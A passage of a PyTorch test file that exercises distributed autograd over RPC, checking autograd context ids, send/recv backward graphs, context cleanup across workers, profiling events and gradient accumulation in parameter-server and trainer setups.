return torch.ones((3, 3), requires_grad=True)
@torch.jit.script
def create_torchscript_tensor() -> torch.Tensor:
return torch.ones((3, 3)).requires_grad_()
def my_py_add(t1, t2):
return torch.add(t1, t2)
def my_scalar_add(a, b):
return a + b
def my_rref_add(rref_t1, t2):
ret = torch.add(rref_t1.local_value(), t2)
return ret
@torch.jit.script
def my_script_add(t1, t2):
return torch.add(t1, t2)
@torch.jit.script
def my_script_ref_add(ref_t1: RRef[torch.Tensor], t2: torch.Tensor) -> torch.Tensor:
t1 = ref_t1.to_here()
return torch.add(t1, t2)
def my_nested_rref_add(dst, rref_t1, t2):
return rpc.rpc_sync(dst, my_rref_add, args=(rref_t1, t2))
def ret_requires_grad():
return requires_grad_tensor
def my_py_nested_call(t1, t2, dst, world_size, hops):
next_dst = (dst + 1) % world_size
if hops > 0:
return rpc.rpc_sync(
worker_name(next_dst),
my_py_nested_call,
args=(t1, t2, next_dst, world_size, hops - 1),
)
else:
return rpc.rpc_sync(worker_name(next_dst), my_py_add, args=(t1, t2))
# after dist autograd context is cleaned up, it should be cleaned up on other
# nodes. This helper allows timeout_seconds for those RPCs to be completed, and
# ensures that all the contexts have been cleaned up in that timeframe.
def _all_contexts_cleaned_up(timeout_seconds=10):
global known_context_ids
start = time.time()
context_id_to_raised = set()
while (
time.time() - start < timeout_seconds
and context_id_to_raised != known_context_ids
):
for context_id in known_context_ids:
try:
dist_autograd._retrieve_context(context_id)
except RuntimeError:
context_id_to_raised.add(context_id)
# all contexts have been cleaned up if trying to retrieve any context resulted in a RuntimeError.
success = context_id_to_raised == known_context_ids
return success
# This function creates a dist autograd context, runs rpc_sync on the given ps,
# and then blocks until the ps has verified the grads are correctly accumulated.
def _run_trainer(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_rref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
# This function is the same as _run_trainer, except rpc calls torchscript
# function "my_script_ref_add" instead of python funciton "my_rref_add"
def _run_trainer_torchscript(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_script_ref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
class SimulateBackwardError(Function):
_simulate_error = True
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if SimulateBackwardError._simulate_error:
raise Exception("Simulate error on backward pass")
else:
return input
class ExecMode(Enum):
LOCAL = 1 # Run the operation locally.
RPC_SYNC = 2 # Run the operation using rpc_sync
REMOTE = 3 # Run the operation using remote.
RPC_ASYNC = 4 # Run the operation using rpc_async
class DistAutogradTest(RpcAgentTestFixture):
def _exec_func_with_dst(self, dst, exec_mode, method, *args):
if ExecMode.LOCAL == exec_mode:
if len(args) == 1 and isinstance(args[0], list):
return method(*args[0])
return method(*args)
elif ExecMode.RPC_SYNC == exec_mode:
return rpc.rpc_sync(worker_name(dst), method, args=(args))
elif ExecMode.REMOTE == exec_mode:
return rpc.remote(worker_name(dst), method, args=(args)).to_here()
elif ExecMode.RPC_ASYNC == exec_mode:
fut = rpc.rpc_async(worker_name(dst), method, args=(args))
return fut.wait()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
def _exec_func(self, exec_mode, method, *args):
return self._exec_func_with_dst(
self._next_rank(), exec_mode, method, *args
)
def _next_rank(self):
if hasattr(self, "dst_rank"):
self.dst_rank = (self.dst_rank + 1) % self.world_size
if self.dst_rank == self.rank:
return self._next_rank()
else:
self.dst_rank = (self.rank + 1) % self.world_size
return self.dst_rank
def _check_rpc_done(self, rank_distance):
_check_rpc_done(rank_distance)
@dist_init
def test_autograd_context(self):
# Verify max possible id.
max_auto_increment = 281474976710655
self.assertEqual(
max_auto_increment + (self.worker_id << 48), dist_autograd._get_max_id()
)
context_ids = []
for i in range(200):
with dist_autograd.context() as context_id:
self.assertEqual(
context_id,
dist_autograd._retrieve_context(context_id)._context_id(),
)
# First 16 bits should be worker_id.
self.assertEqual(self.worker_id, context_id >> 48)
context_ids.append(context_id)
for context_id in context_ids:
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd._retrieve_context(context_id)
@dist_init
def test_nested_context(self):
with dist_autograd.context() as context_id:
# Nested contexts not supported.
with self.assertRaisesRegex(
RuntimeError, "Already have an autograd context id for this thread"
):
with dist_autograd.context() as context_id:
pass
# For current context, this rank sends t1 and t2 tensors to dst_rank,
# then get t3 = torch.add(t1, t2) result tensor.
# For the current context in this rank, it expects graph like this:
# send function:
# rpcSendBackward
# / \
# t1.AccumulateGrad t2.AccumulateGrad
#
# recv function:
#
# |
# t3.rpcRecvBackward
#
def _verify_graph_for_first_rpc_call(
self, send_function, recv_function, t1, t2, ret
):
# Retrieve the next functions in the graph.
next_funcs = send_function.next_functions
self.assertEqual(2, len(next_funcs))
# We should now hit t1 and t2 in the autograd graph.
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[0][0].name())
self.assertEqual(t1, next_funcs[0][0].variable)
self.assertEqual(0, next_funcs[0][1])
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[1][0].name())
self.assertEqual(t2, next_funcs[1][0].variable)
self.assertEqual(0, next_funcs[1][1])
# Test recv functions.
self.assertEqual(ret.grad_fn, recv_function)
    # For a context passed from previous nested chain calls, this rank
    # receives two tensors t1 and t2, executes torch.add(t1, t2) and sends
    # the result tensor t3 back.
    # For this context on this rank, the expected graph is:
# send and recv functions:
# rpcSendBackward
# |
# t3.AddBackward0
# / \
# t1.recvRpcBackward t2.recvRpcBackward
def _verify_graph_for_rpc_call_exec(self, send_function):
# Verify next function is AddBackward0
next_funcs = send_function.next_functions
self.assertEqual(1, len(next_funcs))
add_backward_fn = next_funcs[0][0]
self.assertEqual("AddBackward0", add_backward_fn.name())
# Verify the next two functions are the same recv backward function.
next_funcs = add_backward_fn.next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
    # For a context passed from previous nested chain calls, this rank
    # receives two tensors t1 and t2 and forwards them to the next dst via a
    # nested rpc call. On the return route, it receives the result tensor t3
    # from the next dst and forwards t3 back to the previous call.
    # For this context on this rank, the expected graph is:
# send and recv functions for receiving and forwarding t1 and t2:
# rpcSendBackward
# / \
# t1.recvRpcBackward t2.recvRpcBackward
# send and recv functions for receiving and forwarding t3:
# rpcSendBackward
# |
# t3.recvRpcBackward
def _verify_graph_for_nested_rpc_call(self, ctx):
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
        # For the send function created when making the nested rpc call,
        # the next functions of the send function are the two recv functions
        # for the two tensors received from the previous call.
next_funcs = list(send_functions.values())[0].next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
        # For the send function created when returning the response to the
        # previous call, the next function of the send function is the recv
        # function for the result tensor returned from the nested call.
next_funcs = list(send_functions.values())[1].next_functions
self.assertEqual(1, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
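    # Drives a single rpc_sync/remote call from this rank to the next rank, then
    # verifies both the local context's send/recv functions and the graph recorded
    # on the callee (retrieved via the context id shared through _set_rpc_done).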
def _test_graph(self, fn, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), fn, args=(t1, t2))
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), fn, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Verify graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
# Verify graph for previous context id.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
# autograd context should be cleaned up by now.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._retrieve_context(context_id)
# No autograd context available.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._current_context()
@dist_init
def test_graph_for_builtin_call(self):
self._test_graph(torch.add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_python_call(self):
self._test_graph(my_py_add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_builtin_remote_call(self):
self._test_graph(torch.add, ExecMode.REMOTE)
@dist_init
def test_graph_for_python_remote_call(self):
self._test_graph(my_py_add, ExecMode.REMOTE)
# 3-layer nested calls
def _test_graph_for_py_nested_call(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
nest_dst_rank = (dst_rank + 1) % self.world_size
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
# Barrier to ensure all RPCs are done.
dist.barrier()
for rd in [1, 2, 3]:
rpc.rpc_sync(
worker_name((self.rank + rd) % self.world_size),
_set_rpc_done,
args=(context_id, rd),
)
# Barrier to ensure all set_rpc_done have completed.
dist.barrier()
            # For self.rank, there are 4 graphs to verify.
            # One is for the current context id when this rank sends the first
            # rpc call.
            # The second is for the prev context id when this rank makes the
            # 1st nested call.
            # The third is for the prev prev context id when this rank makes
            # the 2nd nested call.
            # The last is for the prev prev prev context id when this rank
            # executes the torch.add() operator.
# Verify first graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Verify second graph for 1st nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# Verify third graph for 2nd nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[2])
self._verify_graph_for_nested_rpc_call(ctx)
# verify last graph for rpc call execution.
ctx = dist_autograd._retrieve_context(ctx_ids[3])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call(self):
self._test_graph_for_py_nested_call(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call(self):
self._test_graph_for_py_nested_call(ExecMode.REMOTE)
# Rank0->Rank1->Rank0
def _test_graph_for_py_nested_call_itself(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name((self.rank + 1) % self.world_size),
_set_rpc_done,
args=(context_id, 1),
)
            # For self.rank, there are 2 graphs to verify.
            # One is for the current context id when this rank sends the first
            # rpc call and executes the torch.add() operator.
            # The other is for the prev context id when this rank makes the
            # nested call.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(2, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[1],
t1,
t2,
ret,
)
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[1])
# Verify two pairs of send and recv functions for nested
# call
self._check_rpc_done(1)
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.REMOTE)
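    # When neither input tensor requires grad, no send/recv autograd functions should
    # be recorded, although the autograd context id itself is still propagated to the
    # callee (checked below via the context id shared through _set_rpc_done).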
def _test_no_graph_with_tensors_not_require_grad(self, exec_mode):
initialize_pg(self.file_init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.add, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
ctx = dist_autograd._current_context()
send_functions = ctx._send_functions()
self.assertEqual(len(send_functions), 0)
recv_functions = ctx._recv_functions()
self.assertEqual(len(recv_functions), 0)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
            # NB: RRef.to_here() always passes the autograd context to the
            # callee, as the caller does not know whether the return value
            # would contain a requires_grad tensor or not.
            #
            # rpc/remote with a udf (_set_rpc_done here) also always passes
            # the autograd context to the callee for the same reason.
self.assertNotEqual(-1, dist_autograd._retrieve_context(ctx_ids[1]))
dist.barrier()
@dist_init
def test_no_graph_with_tensors_not_require_grad(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.RPC_SYNC)
@dist_init
def test_no_graph_with_tensors_not_require_grad_remote(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.REMOTE)
def _test_grad_only_on_return_value(self, exec_mode):
initialize_pg(self.file_init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), ret_requires_grad)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), ret_requires_grad
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
dist_autograd.backward(context_id, [ret.sum()])
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
grads = dist_autograd.get_gradients(ctx_ids[1])
self.assertEqual(1, len(grads))
self.assertIn(requires_grad_tensor, grads)
self.assertEqual(torch.ones_like(ret), grads[requires_grad_tensor])
# due to the above get_gradients call, ensure that dist autograd
# contexts aren't cleaned up until all workers exit context managers
dist.barrier()
@dist_init
def test_grad_only_on_return_value(self):
self._test_grad_only_on_return_value(ExecMode.RPC_SYNC)
@dist_init
def test_grad_only_on_return_value_remote(self):
self._test_grad_only_on_return_value(ExecMode.REMOTE)
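    # Sends a list of tensors where only every other tensor requires grad and checks
    # which tensors end up attached to the send function, as well as that the
    # destination worker id is recorded in the context.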
def _test_rpc_complex_args(self, exec_mode):
with dist_autograd.context() as context_id:
num_tensors = 10
tensors = []
for i in range(num_tensors):
tensors.append(torch.ones(3, 3, requires_grad=(i % 2 == 0)))
dst_rank = self._next_rank()
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.stack, args=(tensors,)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.stack, args=(tensors,)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
self.assertEqual(torch.stack(tensors), ret)
            # Verify the appropriate tensors have been attached to the autograd graph.
next_funcs = list(
dist_autograd._current_context()._send_functions().values()
)[0].next_functions
idx = 0
for i in range(len(next_funcs)):
self.assertEqual(
"torch::autograd::AccumulateGrad", next_funcs[i][0].name()
)
self.assertEqual(tensors[i], next_funcs[i][0].variable)
# Verify that the worker id has been recorded in the context
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(len(worker_ids), 1)
self.assertEqual(worker_ids, {dst_rank})
@dist_init
def test_rpc_complex_args(self):
self._test_rpc_complex_args(ExecMode.RPC_SYNC)
@dist_init
def test_remote_complex_args(self):
self._test_rpc_complex_args(ExecMode.REMOTE)
def context_cleanup_test_helper(self, rpc_args, func, nested=False):
initialize_pg(self.file_init_method, self.rank, self.world_size)
        # Test that in dist autograd, in the case that tensors communicated over RPC
        # do NOT require grad, we still clean up the dist autograd contexts created
        # on other nodes. This is because the autograd context is still
        # communicated over RPC even if the tensor arguments do not require grad, as
        # it is possible that the response could require grad.
if nested:
dst_rank = (self.rank + 1) % self.world_size
nested_dst_rank = (dst_rank + 1) % self.world_size
dst_ranks = {dst_rank}
else:
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
if nested:
rpc.rpc_sync(
worker_name(nested_dst_rank),
_set_rpc_done,
args=(context_id, 2),
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_context_cleanup_tensor_no_grad(self):
t1 = torch.ones(3, 3, requires_grad=False)
self.context_cleanup_test_helper(rpc_args=(t1, t1), func=torch.add)
@dist_init
def test_context_cleanup_no_tensors(self):
self.context_cleanup_test_helper(rpc_args=(1, 1), func=my_scalar_add)
@dist_init
def test_context_cleanup_nested_rpc(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
dst_rank = (self.rank + 1) % self.world_size
args = (t1, t2, dst_rank, self.world_size, 0)
self.context_cleanup_test_helper(
rpc_args=args, func=my_py_nested_call, nested=True
)
@dist_init
def test_worker_ids_recorded(self):
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
# if no tensors require grad, we should still record worker_ids, as
# the autograd context ID is still passed to other workers.
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), torch.add, args=(t1, t2))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
# worker_ids should be recorded when tensors do require grad
t1.requires_grad = True
t2.requires_grad = True
for dst_rank in dst_ranks:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
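    # Profile a distributed backward pass and check that SendRpcBackward and
    # RecvRpcBackward events are recorded and take less CPU time than the overall
    # distributed backward event.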
@dist_init
def test_dist_autograd_profiling(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(3, 3, requires_grad=True)
loss = rpc.rpc_sync(worker_name(self._next_rank()), torch.add, args=(t1, t2)).sum()
with torch.autograd.profiler.profile() as p:
dist_autograd.backward(context_id, [loss])
function_events = p.function_events
def get_event(partial_key):
return [event for event in function_events if partial_key in event.name][0]
send_event = get_event("SendRpcBackward")
recv_event = get_event("RecvRpcBackward")
backward_event = get_event("torch::distributed::autograd::backward")
        # There should be at least one send event and one recv event, corresponding to
        # the send/recv functions executed.
self.assertEqual(send_event.count, 1)
self.assertEqual(recv_event.count, 1)
        # The CPU total for the backward event should be greater than that of send and
        # recv, since applying those functions in the backward pass is a subset of the
        # entire backward pass.
self.assertGreater(backward_event.cpu_time_total, send_event.cpu_time_total)
self.assertGreater(backward_event.cpu_time_total, recv_event.cpu_time_total)
@dist_init
def test_error_in_context(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(6, 6, requires_grad=True)
with self.assertRaises(RuntimeError):
# This should throw an error since matrix sizes don't match.
rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
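    # In LOCAL mode, run the vanilla autograd engine and return the .grad of each
    # input; in the RPC/remote modes, run dist_autograd.backward and check that
    # dist_autograd.get_gradients() matches the locally computed grads.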
def _verify_backwards(self, exec_mode, tensors, context_id, local_grads, *args):
if exec_mode == ExecMode.LOCAL:
torch.autograd.backward(tensors)
return [arg.grad for arg in args]
else:
self._verify_backwards_remote(tensors, context_id, local_grads, *args)
def _verify_backwards_remote(self, tensors, context_id, local_grads, *args):
dist_autograd.backward(context_id, tensors)
# Verify grads were accumulated appropriately.
grads = dist_autograd.get_gradients(context_id)
nargs = len(args)
ngrads = 0
for i in range(0, nargs):
if local_grads[i] is not None:
self.assertIn(args[i], grads)
self.assertEqual(local_grads[i], grads[args[i]])
ngrads += 1
else:
self.assertNotIn(args[i], grads)
self.assertEqual(ngrads, len(grads))
@dist_init
def test_backward_no_grad_on_tensor(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
self.assertIsNone(t1.grad)
self.assertIsNone(t2.grad)
# Now populate .grad with local autograd engine and
# verify dist autograd doesn't mess with it.
loss_local = torch.add(t1, t2).sum()
loss_local.backward()
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
t1_grad_before = t1.grad
t2_grad_before = t2.grad
dist_autograd.backward(context_id, [loss])
self.assertEqual(t1_grad_before, t1.grad)
self.assertEqual(t2_grad_before, t2.grad)
def _test_backward_simple(self, dst):
        # Run the same code locally and with dist autograd and verify the
        # gradients are the same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func_with_dst(
dst, exec_mode, torch.add, t1, t2
)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_simple(self):
self._test_backward_simple(self._next_rank())
@dist_init
def test_backward_simple_self(self):
self._test_backward_simple(self.rank)
# The current rank first creates a tensor on the rref_owner, and then passes
# the rref with another tensor to the callee to run either my_rref_add or
# my_nested_rref_add, depending on whether the callee is the rref owner.
    # The grad of the local tensor lives on the current rank, and the grad of
    # the rref tensor lives on the rref owner.
def _test_backward_rref(self, callee, rref_owner):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
with dist_autograd.context() as context_id:
rref_t1 = rpc.remote(
rref_owner, _torch_ones, args=((3, 3),), kwargs={"requires_grad": True}
)
if callee == rref_owner:
rref = rpc.remote(callee, my_rref_add, args=(rref_t1, t2))
else:
rref = rpc.remote(
callee, my_nested_rref_add, args=(rref_owner, rref_t1, t2)
)
ret = rref.to_here()
dist_autograd.backward(context_id, [ret.sum()])
# verify grads on caller
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t2, grads)
self.assertEqual(grads[t2], t2.grad)
# verify grads on rref owner
self.assertTrue(
rpc.rpc_sync(
rref_owner,
_compare_owner_value,
args=(context_id, rref_t1, t1.grad),
)
)
@dist_init
def test_backward_rref(self):
callee = worker_name(self._next_rank())
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_multi(self):
if self.rank > 0:
callee = "worker0"
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_nested(self):
callee = worker_name((self.rank + 1) % self.world_size)
rref_owner = worker_name((self.rank + 2) % self.world_size)
self._test_backward_rref(callee, rref_owner)
    # In this test, every rank serves as a parameter server (ps) and a driver,
    # and kicks off trainers on the other three ranks. So, we have:
    # ps = rank0 with trainers = rank1/2/3
    # ps = rank1 with trainers = rank2/3/0
    # ps = rank2 with trainers = rank3/0/1
    # ps = rank3 with trainers = rank0/1/2
#
# These four test ps-trainer groups run on completely separate autograd
# graphs, but they share the same set of underlying RpcAgents.
def _test_trainer_ps(self, create_ref_fn, trainer_fn):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
# create rref on self
rref_t1 = rpc.remote(
worker_name(self.rank),
create_ref_fn,
args=())
# kick off forward and backward pass on three other workers (trainers)
rank_diffs = [1, 2, 3]
futures = []
for rank_diff in rank_diffs:
futures.append(
rpc.rpc_async(
worker_name((self.rank + rank_diff) % self.world_size),
trainer_fn,
args=(rref_t1, t2, worker_name(self.rank), rank_diff),
)
)
        # check if the trainers are done with their backward passes
for rank_diff in rank_diffs:
self._check_rpc_done(rank_diff)
# trainers are done and holding the context for verification
accumulate_grad_func = None
for rank_diff in rank_diffs:
# make sure grads are accumulated for the same tensors and values
# are all correct
ctx_id = ctx_ids[rank_diff]
grads = dist_autograd.get_gradients(ctx_id)
local_t1 = rref_t1.to_here()
self.assertIn(local_t1, grads)
self.assertEqual(grads[local_t1], t1.grad)
# unblock trainers
_set_rpc_done(None, 0)
# wait until all trainers are done
torch.futures.wait_all(futures)
@dist_init
def test_trainer_ps(self):
self._test_trainer_ps(create_tensor, _run_trainer)
@dist_init
def test_trainer_ps_torchscript_functions(self):
        # TODO: needs more investigation.
        # There is an rref leak when shutting down; we suspect it is because
        # the rref passed as an arg crosses the pybind boundary and is not
        # garbage collected by Python when calling shutdown().
import torch.distributed.rpc.api as api
api._ignore_rref_leak = True
self._test_trainer_ps(create_torchscript_tensor, _run_trainer_torchscript)
@dist_init
def test_backward_multiple_round_trips(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3))
t3 = torch.rand((3, 3), requires_grad=True)
t4 = torch.rand((3, 3))
t5 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
# Multiple RPCs between different nodes.
val = self._exec_func(exec_mode, torch.add, t1, t2)
val = self._exec_func(exec_mode, torch.mul, t3, val)
s1 = self._exec_func(exec_mode, torch.stack, (t4, val))
s2 = self._exec_func(exec_mode, torch.stack, (t5, val))
val = self._exec_func(exec_mode, torch.bmm, s1, s2)
val = self._exec_func(exec_mode, torch.matmul, val, val)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3, t4, t5
)
local_grads = ret if ret else local_grads
@dist_init
